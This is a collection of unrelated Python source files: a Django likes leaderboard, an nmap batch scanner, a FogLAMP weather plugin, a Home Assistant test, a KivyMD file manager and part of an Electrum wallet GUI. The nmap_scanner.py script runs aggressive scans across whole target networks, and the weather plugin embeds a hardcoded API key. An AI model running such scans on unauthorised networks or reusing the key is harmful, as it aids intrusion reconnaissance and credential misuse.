pointer = data['data']['user']['edge_owner_to_timeline_media'][
'page_info']
if (pointer['has_next_page']):
cursor = pointer['end_cursor']
else:
break
with transaction.atomic():
for entry, likes in entries.items():
Gallery.objects.filter(entry_id=entry).update(likes=likes)
def LeaderBoardView(req):
# updateTheDB()
gallery = Gallery.objects.all().order_by('-likes')[:20]
# t1 = threading.Thread(target=updateTheDB)
# t1.start()
context = {'leaderboard': gallery}
return render(req, 'gallery/leaderboard.html', context)
|
nmap_scanner.py
|
#!/usr/bin/python3
'''
Submits nmap scans to nweb from local targets.txt.
'''
import sys
import requests
import subprocess
import time
import os
import random
import string
import json
import base64
import threading
import multiprocessing
import multiprocessing.pool
from netaddr import *
scope = []
try:
import ipaddress
except ImportError:
print("you should be using python3!")
sys.exit()
def scan(target):
server="http://127.0.0.1:5000"
print("target is "+target)
# scan server
rand = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
print("random value is "+rand)
process = subprocess.Popen(["nmap","-oA","data/nweb."+rand,"-A","-open",target],stdout=subprocess.PIPE)
try:
out, err = process.communicate(timeout=360) # 6 minutes
except:
try:
print("killing slacker process")
process.kill()
except:
print("okay, seems like it was already dead")
print("scan complete, nice")
result={}
for ext in 'nmap','gnmap','xml':
result[ext+"_data"]=open("data/nweb."+rand+"."+ext).read()
os.remove("data/nweb."+rand+"."+ext)
print("sending and deleting nweb."+rand+"."+ext)
if len(result['nmap_data']) < 250:
print("this data looks crappy")
return
else:
print("size was "+str(len(result['nmap_data'])))
# submit result
response=requests.post(server+"/submit",json=json.dumps(result)).text
print("response is:\n"+response)
if len(sys.argv) != 2:
print("./nmap-scanner.py <targets.txt>")
sys.exit(1)
for target in open(sys.argv[1], "r"):
scope.append(IPNetwork(target))
max_threads=3
notifylock=False
for network in scope:
    for ip in network:
        # wait until a worker slot frees up so no target is skipped
        while threading.active_count() >= max_threads:
            if notifylock is False:
                print("too many threads .. waiting")
                notifylock=True
            time.sleep(1)
        notifylock=False
        print("number of threads : "+str(threading.active_count()))
        t = threading.Thread(target=scan, args=(str(ip),))
        t.start()
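# A minimal alternative sketch for bounding concurrency (an assumption, not the
# author's approach): the already-imported multiprocessing.pool can replace the
# manual active_count() polling above.
#
#   pool = multiprocessing.pool.ThreadPool(processes=max_threads)
#   for network in scope:
#       pool.map(scan, (str(ip) for ip in network))
#   pool.close()
#   pool.join()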
|
openweathermap.py
|
# -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
""" Weather report from OpenWeatherMap async plugin """
import copy
import asyncio
import http.client
import json
import logging
from threading import Thread
from aiohttp import web
from foglamp.common import logger
from foglamp.plugins.common import utils
import async_ingest
__author__ = "Mark Riddoch, Ashwin Gopalakrishnan, Amarendra K Sinha"
__copyright__ = "Copyright (c) 2018 Dianomic Systems"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
_DEFAULT_CONFIG = {
'plugin': {
'description': 'Weather Report from OpenWeatherMap',
'type': 'string',
'default': 'openweathermap',
'readonly': 'true'
},
'url': {
'description': 'API URL to fetch information',
'type': 'string',
'default': 'api.openweathermap.org',
'order': '1',
'displayName': 'API URL'
},
'appid': {
'description': 'Application ID registered with OpenWeatherMap',
'type': 'string',
'default': 'bbafe18fb275ae5b200d094e36c574ff',
'order': '2',
'displayName': 'Application ID'
},
'city': {
'description': 'City to obtain weather report for',
'type': 'string',
'default': 'London',
'order': '3',
'displayName': 'City'
},
'assetName': {
'description': 'Asset Name',
'type': 'string',
'default': 'OpenWeatherMap',
'order': '4',
'displayName': 'Asset Name'
},
'rate': {
'description': 'Rate at which to fetch weather report in seconds',
'type': 'integer',
'default': '10',
'minimum': '5',
'order': '5',
'displayName': 'Request Interval'
}
}
_LOGGER = logger.setup(__name__, level=logging.INFO)
c_callback = None
c_ingest_ref = None
loop = None
t = None
task = None
def plugin_info():
""" Returns information about the plugin.
Args:
Returns:
dict: plugin information
Raises:
"""
return {
'name': 'OpenWeatherMap plugin',
'version': '1.7.0',
'mode': 'async',
'type': 'south',
'interface': '1.0',
'config': _DEFAULT_CONFIG
}
def plugin_init(config):
""" Initialise the plugin with WeatherReport class' object that will periodically fetch weather data
Args:
config: JSON configuration document for the South plugin configuration category
Returns:
data: JSON object to be used in future calls to the plugin
Raises:
"""
data = copy.deepcopy(config)
return data
def plugin_start(handle):
global loop, t, task
loop = asyncio.new_event_loop()
try:
url = handle['url']['value']
city = handle['city']['value']
appid = handle['appid']['value']
rate = handle['rate']['value']
asset_name = handle['assetName']['value']
task = WeatherReport(url, city, appid, rate, asset_name)
task.start()
def run():
global loop
loop.run_forever()
t = Thread(target=run)
t.start()
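        # the asyncio loop now runs in this background thread, so the periodic
        # fetches that WeatherReport schedules via loop.call_later() run on it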
except Exception as e:
_LOGGER.exception("OpenWeatherMap plugin failed to start. Details %s", str(e))
raise
def plugin_reconfigure(handle, new_config):
""" Reconfigures the plugin
it should be called when the configuration of the plugin is changed during the operation of the south service.
The new configuration category should be passed.
Args:
handle: handle returned by the plugin initialisation call
new_config: JSON object representing the new configuration category for the category
Returns:
new_handle: new handle to be used in the future calls
Raises:
"""
_LOGGER.info("Old config for OpenWeatherMap plugin {} \n new config {}".format(handle, new_config))
plugin_shutdown(handle)
new_handle = plugin_init(new_config)
plugin_start(new_handle)
return new_handle
def plugin_shutdown(handle):
try:
_LOGGER.info('South OpenWeatherMap plugin shutting down.')
task.stop()
loop.stop()
except Exception as e:
_LOGGER.exception(str(e))
raise
def plugin_register_ingest(handle, callback, ingest_ref):
"""Required plugin interface component to communicate to South C server
Args:
handle: handle returned by the plugin initialisation call
callback: C opaque object required to passed back to C->ingest method
ingest_ref: C opaque object required to passed back to C->ingest method
"""
global c_callback, c_ingest_ref
c_callback = callback
c_ingest_ref = ingest_ref
class WeatherReport(object):
""" Handle integration with OpenWeatherMap API """
__slots__ = ['_interval', 'url', 'city', 'appid', 'asset_name', '_handler']
def __init__(self, url, city, appid, rate, asset_name):
self._interval = float(rate)
self.url = url
self.city = city
self.appid = appid
self.asset_name = asset_name
self._handler = None
def _run(self):
self.fetch()
self._handler = loop.call_later(self._interval, self._run)
def start(self):
self._handler = loop.call_later(self._interval, self._run)
def stop(self):
self._handler.cancel()
def fetch(self):
try:
conn = http.client.HTTPConnection(self.url)
conn.request('GET', '/data/2.5/weather?q={}&APPID={}'.format(self.city, self.appid))
r = conn.getresponse()
res = r.read().decode()
conn.close()
if r.status != 200:
raise ValueError(res)
jdoc = json.loads(res)
reads = {
'city': jdoc['name'],
'wind_speed': jdoc['wind']['speed'],
'clouds': jdoc['clouds']['all'],
'temperature': jdoc['main']['temp'],
'pressure': jdoc['main']['pressure'],
'humidity': jdoc['main']['humidity'],
'visibility': jdoc['visibility']
}
data = {
'asset': self.asset_name,
'timestamp': utils.local_timestamp(),
'readings': reads
}
async_ingest.ingest_callback(c_callback, c_ingest_ref, data)
except ValueError as ex:
err = "Unable to fetch information from api.openweathermap: {}".format(str(ex))
_LOGGER.error(err)
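# --- Illustrative sketch only, not part of the plugin ---
# A standalone request against the same endpoint that WeatherReport.fetch()
# uses above, assuming a valid application ID is substituted; shown only to
# clarify the raw JSON shape that fetch() maps into its reading keys
# (wind.speed, clouds.all, main.temp, main.pressure, main.humidity, visibility):
#
#   import http.client, json
#   conn = http.client.HTTPConnection('api.openweathermap.org')
#   conn.request('GET', '/data/2.5/weather?q=London&APPID=<your-app-id>')
#   body = json.loads(conn.getresponse().read().decode())
#   print(body['main']['temp'], body['wind']['speed'])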
|
test_pool.py
|
"""Test pool."""
import threading
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from homeassistant.components.recorder.const import DB_WORKER_PREFIX
from homeassistant.components.recorder.pool import RecorderPool
def test_recorder_pool(caplog):
"""Test RecorderPool gives the same connection in the creating thread."""
engine = create_engine("sqlite://", poolclass=RecorderPool)
get_session = sessionmaker(bind=engine)
shutdown = False
connections = []
def _get_connection_twice():
session = get_session()
connections.append(session.connection().connection.connection)
session.close()
if shutdown:
engine.pool.shutdown()
session = get_session()
connections.append(session.connection().connection.connection)
session.close()
_get_connection_twice()
assert "accesses the database without the database executor" in caplog.text
assert connections[0] != connections[1]
caplog.clear()
new_thread = threading.Thread(target=_get_connection_twice)
new_thread.start()
new_thread.join()
assert "accesses the database without the database executor" in caplog.text
assert connections[2] != connections[3]
caplog.clear()
new_thread = threading.Thread(target=_get_connection_twice, name=DB_WORKER_PREFIX)
new_thread.start()
new_thread.join()
assert "accesses the database without the database executor" not in caplog.text
assert connections[4] == connections[5]
caplog.clear()
new_thread = threading.Thread(target=_get_connection_twice, name="Recorder")
new_thread.start()
new_thread.join()
assert "accesses the database without the database executor" not in caplog.text
assert connections[6] == connections[7]
shutdown = True
caplog.clear()
new_thread = threading.Thread(target=_get_connection_twice, name=DB_WORKER_PREFIX)
new_thread.start()
new_thread.join()
assert "accesses the database without the database executor" not in caplog.text
assert connections[8] != connections[9]
|
filemanager.py
|
"""
File Manager
============
Copyright (c) 2019 Ivanov Yuri
For suggestions and questions:
<[email protected]>
This file is distributed under the terms of the same license,
as the Kivy framework.
A simple manager for selecting directories and files.
Example
-------
from kivy.app import App
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.modalview import ModalView
from kivymd.filemanager import MDFileManager
from kivymd.theming import ThemeManager
from kivymd.toast import toast
Builder.load_string('''
#:import MDToolbar kivymd.toolbar.MDToolbar
#:import MDRoundFlatIconButton kivymd.button.MDRoundFlatIconButton
<ExampleFileManager@BoxLayout>
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: app.title
left_action_items: [['menu', lambda x: None]]
elevation: 10
md_bg_color: app.theme_cls.primary_color
FloatLayout:
MDRoundFlatIconButton:
text: "Open manager"
icon: "folder"
pos_hint: {'center_x': .5, 'center_y': .6}
on_release: app.file_manager_open()
''')
class Example(App):
theme_cls = ThemeManager()
theme_cls.primary_palette = 'Teal'
title = "File Manage"
def __init__(self, **kwargs):
super().__init__(**kwargs)
Window.bind(on_keyboard=self.events)
self.manager_open = False
self.manager = None
def build(self):
return Factory.ExampleFileManager()
def file_manager_open(self):
if not self.manager:
self.manager = ModalView(size_hint=(1, 1), auto_dismiss=False)
self.file_manager = MDFileManager(
exit_manager=self.exit_manager, select_path=self.select_path)
self.manager.add_widget(self.file_manager)
self.file_manager.show('/') # output manager to the screen
self.manager_open = True
self.manager.open()
def select_path(self, path):
'''It will be called when you click on the file name
or the catalog selection button.
:type path: str;
:param path: path to the selected directory or file;
'''
self.exit_manager()
toast(path)
def exit_manager(self, *args):
'''Called when the user reaches the root of the directory tree.'''
self.manager.dismiss()
self.manager_open = False
def events(self, instance, keyboard, keycode, text, modifiers):
        '''Called when buttons are pressed on the mobile device.'''
if keyboard in (1001, 27):
if self.manager_open:
self.file_manager.back()
return True
Example().run()
"""
import os
import threading
from PIL import Image
from kivy.app import App
from kivy.metrics import dp
from kivy import PY2
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.lang import Builder
from kivy.uix.image import AsyncImage
from kivy.properties import ObjectProperty, StringProperty, ListProperty, \
BooleanProperty, NumericProperty, OptionProperty
import kivymd.material_resources as m_res
from kivymd import images_path
from kivymd.list import ILeftBodyTouch, ILeftBody, IRightBody, IRightBodyTouch
from kivymd.font_definitions import theme_font_styles
from kivymd.ripplebehavior import RectangularRippleBehavior, \
CircularRippleBehavior
from kivymd.theming import ThemableBehavior
from kivymd.button import MDIconButton
ACTIVITY_MANAGER = '''
#:import os os
#:import Window kivy.core.window.Window
#:import MDToolbar kivymd.toolbar.MDToolbar
#:import MDFloatingActionButton kivymd.button.MDFloatingActionButton
#:import MDSeparator kivymd.cards.MDSeparator
<BodyManager@BoxLayout>
icon: 'folder'
path: ''
background_normal: ''
background_down: ''
dir_or_file_name: ''
access_string: ''
events_callback: lambda x: None
orientation: 'vertical'
ModifiedOneLineIconListItem:
text: root.dir_or_file_name
on_release: root.events_callback(root.path)
IconFolder:
disabled: True
icon: root.icon
MDSeparator:
<LabelContent@MDLabel>
size_hint_y: None
height: self.texture_size[1]
shorten: True
shorten_from: 'center'
halign: 'center'
text_size: self.width, None
<BodyManagerWithPrevious>
paths: []
path: ''
type: 'folder'
events_callback: lambda x: None
GridLayout:
id: grid_box
cols: 3
row_default_height: (self.width - self.cols*self.spacing[0])/self.cols
row_force_default: True
size_hint_y: None
height: self.minimum_height
padding: dp(4), dp(4)
spacing: dp(4)
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_1, root.paths, 1, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_1.text))
LabelContent:
id: label_box_1
text:
os.path.split(root.paths[0])[1].replace('thumb_', '')\
if len(root.paths) >= 1 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_2, root.paths, 2, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_2.text))
LabelContent:
id: label_box_2
text:
os.path.split(root.paths[1])[1].replace('thumb_', '')\
if len(root.paths) >= 2 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_3, root.paths, 3, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_3.text))
LabelContent:
id: label_box_3
text:
os.path.split(root.paths[2])[1].replace('thumb_', '')\
if len(root.paths) >= 3 else ''
<FloatButton>
anchor_x: 'right'
anchor_y: 'bottom'
size_hint_y: None
height: dp(56)
padding: dp(10)
MDFloatingActionButton:
size_hint: None, None
size:dp(56), dp(56)
icon: root.icon
opposite_colors: True
elevation: 8
on_release: root.callback()
md_bg_color: root.md_bg_color
<MDFileManager>
canvas:
Color:
rgba:
1, 1, 1, 1
Rectangle:
size: self.size
pos: self.pos
BoxLayout:
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: '%s' % root.current_path
right_action_items: [['close-box', lambda x: root.exit_manager(1)]]
left_action_items: [['chevron-left', lambda x: root.back()]]
elevation: 10
md_bg_color: root.theme_cls.primary_color
RecycleView:
id: rv
key_viewclass: 'viewclass'
key_size: 'height'
bar_width: dp(4)
bar_color: root.theme_cls.primary_color
on_scroll_stop: root.update_list_images()
RecycleBoxLayout:
padding: dp(10)
default_size: None, dp(48)
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
<ModifiedBaseListItem>
size_hint_y: None
canvas:
Color:
rgba:
self.theme_cls.divider_color if root.divider is not None\
else (0, 0, 0, 0)
Line:
points: (root.x ,root.y, root.x+self.width, root.y)\
if root.divider == 'Full' else\
(root.x+root._txt_left_pad, root.y,\
root.x+self.width-root._txt_left_pad-root._txt_right_pad,\
root.y)
BoxLayout:
id: _text_container
orientation: 'vertical'
pos: root.pos
padding:
root._txt_left_pad, root._txt_top_pad,\
root._txt_right_pad, root._txt_bot_pad
MDLabel:
id: _lbl_primary
text: root.text
font_style: root.font_style
theme_text_color: root.theme_text_color
size_hint_y: None
shorten: True
max_lines: 1
height: self.texture_size[1]
<ModifiedOneLineIconListItem>
BoxLayout:
id: _left_container
size_hint: None, None
x: root.x + dp(16)
y: root.y + root.height/2 - self.height/2
size: dp(48), dp(48)
'''
class IconButton(CircularRippleBehavior, ButtonBehavior, AsyncImage):
pass
class FloatButton(AnchorLayout):
callback = ObjectProperty()
md_bg_color = ListProperty([1, 1, 1, 1])
icon = StringProperty()
class ModifiedBaseListItem(ThemableBehavior, RectangularRippleBehavior,
ButtonBehavior, FloatLayout):
"""Base class to all ListItems. Not supposed to be instantiated on its own.
"""
text = StringProperty()
"""Text shown in the first line.
:attr:`text` is a :class:`~kivy.properties.StringProperty` and defaults
to "".
"""
text_color = ListProperty(None)
"""Text color used if theme_text_color is set to 'Custom'"""
font_style = OptionProperty('Subtitle1', options=theme_font_styles)
theme_text_color = StringProperty('Primary', allownone=True)
"""Theme text color for primary text"""
secondary_text = StringProperty()
"""Text shown in the second and potentially third line.
The text will wrap into the third line if the ListItem's type is set to
\'one-line\'. It can be forced into the third line by adding a \\n
escape sequence.
:attr:`secondary_text` is a :class:`~kivy.properties.StringProperty` and
defaults to "".
"""
secondary_text_color = ListProperty(None)
"""Text color used for secondary text if secondary_theme_text_color
is set to 'Custom'"""
secondary_theme_text_color = StringProperty('Secondary', allownone=True)
"""Theme text color for secondary primary text"""
secondary_font_style = OptionProperty('Body1', options=theme_font_styles)
divider = OptionProperty('Full', options=['Full', 'Inset', None],
allownone=True)
_txt_left_pad = NumericProperty(dp(16))
_txt_top_pad = NumericProperty()
_txt_bot_pad = NumericProperty()
_txt_right_pad = NumericProperty(m_res.HORIZ_MARGINS)
_num_lines = 2
class ModifiedOneLineListItem(ModifiedBaseListItem):
"""A one line list item"""
_txt_top_pad = NumericProperty(dp(16))
_txt_bot_pad = NumericProperty(dp(15)) # dp(20) - dp(5)
_num_lines = 1
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.height = dp(48)
class ContainerSupport:
"""Overrides add_widget in a ListItem to include support for I*Body
    widgets when the appropriate containers are present.
"""
_touchable_widgets = ListProperty()
def add_widget(self, widget, index=0):
if issubclass(widget.__class__, ILeftBody):
self.ids['_left_container'].add_widget(widget)
elif issubclass(widget.__class__, ILeftBodyTouch):
self.ids['_left_container'].add_widget(widget)
self._touchable_widgets.append(widget)
elif issubclass(widget.__class__, IRightBody):
self.ids['_right_container'].add_widget(widget)
elif issubclass(widget.__class__, IRightBodyTouch):
self.ids['_right_container'].add_widget(widget)
self._touchable_widgets.append(widget)
else:
return super().add_widget(widget)
def remove_widget(self, widget):
super().remove_widget(widget)
if widget in self._touchable_widgets:
self._touchable_widgets.remove(widget)
def on_touch_down(self, touch):
if self.propagate_touch_to_touchable_widgets(touch, 'down'):
return
super().on_touch_down(touch)
def on_touch_move(self, touch, *args):
if self.propagate_touch_to_touchable_widgets(touch, 'move', *args):
return
super().on_touch_move(touch, *args)
def on_touch_up(self, touch):
if self.propagate_touch_to_touchable_widgets(touch, 'up'):
return
super().on_touch_up(touch)
def propagate_touch_to_touchable_widgets(self, touch, touch_event, *args):
triggered = False
for i in self._touchable_widgets:
if i.collide_point(touch.x, touch.y):
triggered = True
if touch_event == 'down':
i.on_touch_down(touch)
elif touch_event == 'move':
i.on_touch_move(touch, *args)
elif touch_event == 'up':
i.on_touch_up(touch)
return triggered
class ModifiedOneLineIconListItem(ContainerSupport, ModifiedOneLineListItem):
_txt_left_pad = NumericProperty(dp(72))
class IconFolder(ILeftBodyTouch, MDIconButton):
pass
class BodyManagerWithPrevious(BoxLayout):
def get_source(self, app, source_type, instance_label, paths, index,
instance_content):
if source_type == 'folder' and instance_label.text != '':
source = f'{images_path}folder.png'
else:
if len(paths) >= index:
source = paths[index - 1]
else:
source = f'{images_path}transparent.png'
if PY2:
return source.decode('u8')
return source
# FIXME: Add color for Black and White theme
# FIXME: When you first create the application cache,
# it crashes after a while with error:
'''
Traceback (most recent call last):
File "/home/kivy/Projects/KivyMD/demos/kitchen_sink/main.py", line 1698,
in <module>
KitchenSink().run()
File "/usr/lib/python3/dist-packages/kivy/app.py", line 826, in run
runTouchApp()
File "/usr/lib/python3/dist-packages/kivy/base.py", line 502, in runTouchApp
EventLoop.window.mainloop()
File "/usr/lib/python3/dist-packages/kivy/core/window/window_sdl2.py",
line 727, in mainloop
self._mainloop()
File "/usr/lib/python3/dist-packages/kivy/core/window/window_sdl2.py",
line 460, in _mainloop
EventLoop.idle()
File "/usr/lib/python3/dist-packages/kivy/base.py", line 337, in idle
Clock.tick()
File "/usr/lib/python3/dist-packages/kivy/clock.py", line 581, in tick
self._process_events()
File "kivy/_clock.pyx", line 384,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7839)
File "kivy/_clock.pyx", line 414,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7597)
File "kivy/_clock.pyx", line 412,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7519)
File "kivy/_clock.pyx", line 167,
in kivy._clock.ClockEvent.tick (kivy/_clock.c:3248)
File "/usr/lib/python3/dist-packages/kivy/cache.py",
line 212, in _purge_by_timeout
lastaccess = Cache._objects[category][key]['lastaccess']
KeyError: '/path/to/image'
'''
class MDFileManager(ThemableBehavior, FloatLayout):
icon = StringProperty('check')
'''The icon that will be used on the directory selection button.'''
exit_manager = ObjectProperty(lambda x: None)
'''Function called when the user reaches directory tree root.'''
select_path = ObjectProperty(lambda x: None)
'''Function, called when selecting a file/directory.'''
ext = ListProperty()
'''List of file extensions to be displayed
in the manager. For example, ['py', 'kv'] - will filter out all files,
except python scripts and Kv Language.'''
search = StringProperty('all')
    '''It can take the values 'dirs' or 'files' - display only directories
    or only files. By default, it displays both folders and files.'''
current_path = StringProperty('/')
'''Current directory.'''
use_access = BooleanProperty(True)
    '''Show access rights for files and directories.'''
previous = BooleanProperty(False)
'''Shows only image previews.'''
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.history = [] # directory navigation history
        # If False, the opened directory is not added to the history
        # (used when the user navigates back through the tree).
self.history_flag = True
toolbar_label = self.ids.toolbar.children[1].children[0]
toolbar_label.font_style = 'Subtitle1'
if self.previous:
self.ext = ['.png', '.jpg', '.jpeg']
self.app = App.get_running_app()
if not os.path.exists('%s/thumb' % self.app.user_data_dir):
os.mkdir('%s/thumb' % self.app.user_data_dir)
else:
action_button = FloatButton(
callback=self.select_directory_on_press_button,
md_bg_color=self.theme_cls.primary_color,
icon=self.icon)
self.add_widget(action_button)
def update_list_images(self):
self.ids.rv.refresh_from_layout()
def split_list(self, l, n):
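        # splits a flat list into consecutive chunks of at most n items, e.g.
        # split_list([1, 2, 3, 4, 5], 3) yields [1, 2, 3] and [4, 5]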
n = max(1, n)
if PY2:
return (l[i:i + n] for i in xrange(0, len(l), n))
else:
return (l[i:i + n] for i in range(0, len(l), n))
def create_previous(self, path):
for image in os.listdir(path):
_path = os.path.join(path, image)
if os.path.isfile(_path):
if self.count_ext(_path):
path_to_thumb = \
'%s/thumb/thumb_%s' % (self.app.user_data_dir, image)
if not os.path.exists(path_to_thumb):
im = Image.open(os.path.join(path, image))
im.thumbnail((200, 200))
im.save(path_to_thumb, "PNG")
def check_theme(self):
self.canvas.children[0].rgba = [0, 0, 0, 1]\
if self.theme_cls.theme_style == 'Dark' else [1, 1, 1, 1]
def show(self, path):
"""Forms the body of a directory tree."""
self.check_theme()
dirs, files = self.get_content(path)
if self.previous:
threading.Thread(target=self.create_previous, args=(path,)).start()
split_dirs = self.split_list(dirs, 3)
split_files = self.split_list(files, 3)
self.current_path = path
manager_list = []
if dirs == [] and files == []: # selected directory
pass
elif not dirs and not files: # directory is unavailable
return
if self.previous:
for list_dirs in split_dirs:
manager_list.append({
'viewclass': 'BodyManagerWithPrevious',
'path': path,
'paths': list_dirs,
'type': 'folder',
'events_callback': self.select_dir_or_file,
'height': dp(105)
})
for list_files in list(split_files):
manager_list.append({
'viewclass': 'BodyManagerWithPrevious',
'path': path,
'paths': list_files,
'type': 'files',
'events_callback': self.select_dir_or_file,
'height': dp(105)
})
else:
for name in dirs:
_path = path + name if path == '/' else path + '/' + name
access_string = self.get_access_string(_path)
if 'r' not in access_string:
icon = 'folder-lock'
else:
icon = 'folder'
manager_list.append({
'viewclass': 'BodyManager',
'path': _path,
'icon': icon,
'dir_or_file_name': name,
'access_string': access_string,
'events_callback': self.select_dir_or_file
})
for name in files:
_path = path + name if path == '/' else path + '/' + name
manager_list.append({
'viewclass': 'BodyManager',
'path': _path,
'icon': 'file-outline',
'dir_or_file_name': name,
'access_string': self.get_access_string(_path),
'events_callback': self.select_dir_or_file
})
self.ids.rv.data = manager_list
def count_ext(self, path):
ext = os.path.splitext(path)[1]
if ext != '':
if ext.lower() in self.ext or ext.upper() in self.ext:
return True
return False
def get_access_string(self, path):
access_string = ''
if self.use_access:
access_data = {'r': os.R_OK, 'w': os.W_OK, 'x': os.X_OK}
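            # e.g. a readable and executable but non-writable path yields 'r-x',
            # while '---' means no access at all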
for access in access_data.keys():
access_string += access if os.access(path, access_data[
access]) else '-'
return access_string
def get_content(self, path):
"""Returns a list of the type [[Folder List], [file list]]."""
try:
files = []
dirs = []
if self.history_flag:
self.history.append(path)
if not self.history_flag:
self.history_flag = True
for content in os.listdir(path):
if os.path.isdir('%s/%s' % (path, content)):
if self.search == 'all' or self.search == 'dirs':
dirs.append(content)
else:
if self.search == 'all' or self.search == 'files':
if len(self.ext) != 0:
try:
if self.count_ext(content):
if self.previous:
files.append('%s/thumb/thumb_%s' % (
self.app.user_data_dir, content))
else:
files.append(content)
except IndexError:
pass
else:
files.append(content)
return dirs, files
except OSError:
self.history.pop()
return None, None
def select_dir_or_file(self, path):
"""Called by tap on the name of the directory or file."""
if os.path.isfile(path):
self.history = []
self.select_path(path)
return
self.current_path = path
self.show(path)
def back(self):
"""Returning to the branch down in the directory tree."""
if len(self.history) == 1:
path, end = os.path.split(self.history[0])
if end == '':
self.exit_manager(1)
return
self.history[0] = path
else:
self.history.pop()
path = self.history[-1]
self.history_flag = False
self.select_dir_or_file(path)
def select_directory_on_press_button(self, *args):
self.history = []
self.select_path(self.current_path)
Builder.load_string(ACTIVITY_MANAGER)
|
screens.py
|
import asyncio
from decimal import Decimal
import threading
from typing import TYPE_CHECKING, List, Optional, Dict, Any
from kivy.app import App
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.recycleview import RecycleView
from electrum_grlc.invoices import (PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING,
PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT,
LNInvoice, pr_expiration_values, Invoice, OnchainInvoice)
from electrum_grlc import bitcoin, constants
from electrum_grlc.transaction import tx_from_any, PartialTxOutput
from electrum_grlc.util import (parse_URI, InvalidBitcoinURI, TxMinedInfo, maybe_extract_bolt11_invoice,
InvoiceError, format_time, parse_max_spend)
from electrum_grlc.lnaddr import lndecode, LnInvoiceException
from electrum_grlc.logging import Logger
from .dialogs.confirm_tx_dialog import ConfirmTxDialog
from electrum_grlc.gui.kivy import KIVY_GUI_PATH
from electrum_grlc.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum_grlc.gui.kivy.main_window import ElectrumWindow
from electrum_grlc.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def on_enter(self):
        # FIXME: use a proper event instead of relying on the screen's animation time
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
def on_activate(self):
setattr(self.app, self.kvname + '_screen', self)
self.update()
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
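# the integer status returned by wallet.get_tx_status() is used directly as an
# index into TX_ICONS (see HistoryScreen.get_card below)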
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/history.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/send.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/lightning'
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/' + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff=True)
ri['base_unit'] = self.app.base_unit
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
ri['fx_ccy'] = tx_item['fiat_value'].ccy
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
